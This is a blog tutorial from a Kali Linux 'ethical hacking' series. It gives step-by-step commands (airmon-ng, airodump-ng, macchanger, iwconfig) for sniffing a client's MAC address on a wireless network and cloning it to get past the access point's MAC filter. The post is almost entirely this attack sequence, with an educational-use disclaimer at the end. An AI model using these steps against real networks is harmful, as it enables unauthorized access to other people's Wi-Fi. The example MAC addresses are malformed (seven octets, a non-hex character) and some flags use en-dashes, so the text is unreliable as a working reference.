Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter


BY : BIJAY ACHARYA http://bijayacharya.com/

Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is 3rd part, & I’ll explain process of bypassing MAC Address Filter on an AP (Access Point).

# 3 basic Process :

– Finding the AP : airmon-ng & airodump-ng

– Finding an associated client : airodump-ng

– Finally, using the Macchanger

# . . . Let’s Begin,

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal, & run ifconfig)

– Let’s start to monitor on that wireless interface, run :

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (monitor mode enabled)

– Verify that both interfaces are up & running, run

airmon-ng

– Watch for wlan0 & mon0 , Run :

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– In next step, you will get BSSID and ESSID, channel, cipher. If there is any hidden SSID, then ESSID will be format like this : <length: 0> or with no SSID. [We, saw in 2nd part, on how to uncover this hidden SSID]. But, here you can use any SSID with Open Encryption, or SSID with known password. We will use the MAC address, that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T & channel ‘1’ (Assume, MAC address filter is done in this system & lets suppose it’s SSID is nhc-BJ)

– Now, we try to find out the Client & his MAC Associated with this AP (nhc-BJ). So, that we can use that MAC to bypass filter. Run;

airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel, channel is 1 for BSSID we are trying to connect, -a is for showing only the client associated with this BSSID)

– You will get MAC address with Station associated with that AP, and this is client’s station. (Lets assume Mac = 00:C1:52:11:20:13:7D)

– CTRL+C (press)

– Run ;

macchanger –help
(notice, -m for setting mac)

-Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(if Device or resource busy, then run following command)

airmon-ng stop wlan0

– Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(in success, you will see msg like ‘faked MAC’)

-Run ;

ifconfig wlan0 down

ifconfig wlan0 up

(now, lets see whether we can associate with SSID now or not, with this Faked MAC)

Run ;

iwconfig wlan0 essid nhc-BJ channel 1

(if not run in kali, run it in BackTrack. Or, see update version for kali)

iwconfig wlan0

(if success, Access Point will be associated)

“This series is only for educational purpose, practice this series lab in virtual/separate network, always avoid illegal activities, and if you can, then support us to fight against black hat hackers”

# Join our Facebook NHC group, to get most out of this series

http://www.facebook.com/groups/nepalesehackerscommunity

# Register in our NHC Forum Website

http://www.nhc.bijayacharya.com

# For, free video tutorial & minimum priced certificate, register my OCN (Online Course Nepal) here : http://www.ocn.bijayacharya.com(Remember, Videos are free to watch, you will pay only if you want certificate :), so that we can maintain this open source culture)

ATTACHMENTS
image005ab.png
image005ab.png (26.61 KiB) 

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s